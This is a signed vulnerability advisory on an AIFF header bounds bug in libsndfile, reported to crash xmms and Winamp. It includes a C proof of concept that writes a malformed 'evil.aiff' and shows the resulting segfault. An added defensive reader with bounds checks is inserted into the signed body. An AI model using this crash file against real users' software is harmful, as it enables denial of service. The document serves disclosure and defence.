libsndfile AIFF buffer unverified

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

libsndfile AIFF buffer unverified

A security issue affects the following library/software releases

libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <= 5.541

And possibly more

- -BACKGROUND

Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.

- -DESCRIPTION

While testing and debugging Winamp, I verified that the bug is specific to
the libsndfile library. Some of the functions that read AIFF file headers
do not check the bounds of CommonChunk.ckSize before using it. There may be
other functions with the same problem. One of the errors occurs when memset
is called with this unverified size as its length.

Quoted code segment from src/aiff.c, line 847:
============================================================
else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
{
//Some lines omitted

memset (psf->u.scbuf, 0, comm_fmt->size);
============================================================
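As an added example (not libsndfile's code and not part of the advisory), the following C reader shows the bounds check the description reports as missing: the COMM ckSize field read from the file is validated against both the remaining input length and the fixed scratch buffer before it is used as a memset/memcpy length. SCBUF_SIZE, the function and status names, and the three sample headers are assumptions constructed for this example; the first sample mirrors the layout of the advisory's evil.aiff (ckSize = 0x41414141).

```c
/* Added example, not libsndfile code: a minimal AIFF/AIFC header reader that
 * validates the COMM chunk size before using it as a memset/memcpy length.
 * SCBUF_SIZE, the names below and the sample inputs are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SCBUF_SIZE   64U   /* assumed size of the fixed scratch buffer (psf->u.scbuf) */
#define AIFF_HDR_LEN 20U   /* FORM(4) formSize(4) "AIFF"(4) ckID(4) ckSize(4) */

enum aiff_status {
    AIFF_OK = 0,
    AIFF_TRUNCATED,            /* input shorter than the fixed header */
    AIFF_BAD_MAGIC,            /* not FORM/AIFF(C), or first chunk is not COMM */
    AIFF_CKSIZE_EXCEEDS_FILE,  /* ckSize larger than the bytes that follow it */
    AIFF_CKSIZE_EXCEEDS_BUF    /* ckSize larger than the destination buffer */
};

static uint32_t read_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse the fixed header, validate ckSize, then copy the COMM payload into scbuf.
 * The two range checks on ck_size are the step the advisory reports as missing
 * before memset(psf->u.scbuf, 0, comm_fmt->size). */
enum aiff_status aiff_load_comm(const uint8_t *data, size_t len,
                                uint8_t scbuf[SCBUF_SIZE], uint32_t *ck_size_out)
{
    if (len < AIFF_HDR_LEN)
        return AIFF_TRUNCATED;
    if (memcmp(data, "FORM", 4) != 0)
        return AIFF_BAD_MAGIC;
    if (memcmp(data + 8, "AIFF", 4) != 0 && memcmp(data + 8, "AIFC", 4) != 0)
        return AIFF_BAD_MAGIC;
    if (memcmp(data + 12, "COMM", 4) != 0)
        return AIFF_BAD_MAGIC;   /* this example only handles a COMM-first layout */

    uint32_t ck_size = read_be32(data + 16);
    if (ck_size_out)
        *ck_size_out = ck_size;

    /* ck_size comes straight from the file: bound it against the input... */
    if (ck_size > len - AIFF_HDR_LEN)
        return AIFF_CKSIZE_EXCEEDS_FILE;
    /* ...and against the destination before any memset/memcpy uses it. */
    if (ck_size > SCBUF_SIZE)
        return AIFF_CKSIZE_EXCEEDS_BUF;

    memset(scbuf, 0, SCBUF_SIZE);
    memcpy(scbuf, data + AIFF_HDR_LEN, ck_size);
    return AIFF_OK;
}

/* Constructed input 1: the layout of the advisory's evil.aiff, with the COMM
 * ckSize field reading 0x41414141 ("AAAA") and only four bytes after it. */
static const uint8_t bad_aiff[] = {
    'F','O','R','M', 0x00,0x04,0xcd,0xec, 'A','I','F','F',
    'C','O','M','M', 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41
};

/* Constructed input 2: ckSize = 96 is consistent with the file length but
 * larger than the 64-byte scratch buffer (payload left zeroed). */
static const uint8_t big_aiff[AIFF_HDR_LEN + 96] = {
    'F','O','R','M', 0x00,0x00,0x00,0x6c, 'A','I','F','F',
    'C','O','M','M', 0x00,0x00,0x00,0x60
};

/* Constructed input 3: a well-formed 18-byte COMM chunk (2 ch, 16-bit, 44100 Hz). */
static const uint8_t good_aiff[] = {
    'F','O','R','M', 0x00,0x00,0x00,0x1e, 'A','I','F','F',
    'C','O','M','M', 0x00,0x00,0x00,0x12,
    0x00,0x02,                                          /* numChannels */
    0x00,0x00,0x00,0x00,                                /* numSampleFrames */
    0x00,0x10,                                          /* sampleSize */
    0x40,0x0e,0xac,0x44,0x00,0x00,0x00,0x00,0x00,0x00   /* sampleRate, 80-bit float */
};

/* Run the reader on one sample and return its status code. */
int check_sample(const uint8_t *data, size_t len)
{
    uint8_t scbuf[SCBUF_SIZE];
    uint32_t ck_size = 0;
    return (int)aiff_load_comm(data, len, scbuf, &ck_size);
}

int main(void)
{
    printf("evil.aiff layout -> status %d\n", check_sample(bad_aiff, sizeof bad_aiff));
    printf("ckSize 96        -> status %d\n", check_sample(big_aiff, sizeof big_aiff));
    printf("well-formed      -> status %d\n", check_sample(good_aiff, sizeof good_aiff));
    return 0;
}
```

The order of the two checks matters in practice: a size that exceeds the remaining file is rejected first, so a reader that later uses ck_size to skip or read chunk data never runs past the end of the input, and only sizes that fit the file are then compared against the scratch buffer.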

- -CODE

============================================================
#include <stdio.h>
#include <stdlib.h>

/* 81-byte AIFF header: "FORM", form size, "AIFF", then a "COMM" chunk whose
 * ckSize field and payload are filled with 0x41 bytes (ckSize = 0x41414141). */
#define AIFFSIZE 81
static const char aiffbuff[] =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void) {
    /* Binary mode so no byte of the header is altered by newline translation. */
    FILE *aiff = fopen("evil.aiff", "wb");
    if (aiff == NULL) {
        perror("fopen");
        return EXIT_FAILURE;
    }
    if (fwrite(aiffbuff, AIFFSIZE, 1, aiff) != 1) {
        perror("fwrite");
        fclose(aiff);
        return EXIT_FAILURE;
    }
    fclose(aiff);
    return EXIT_SUCCESS;
}

============================================================

When these applications process a file with these invalid headers, they
stop with an unexpected error. tcsh sample:

============================================================

Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff

Segmentation fault

You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.

============================================================

- -IMPACT

Just for fun, but a denial of service against any program that uses
the library.

Regards,

Anon[at]elhacker.net


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----
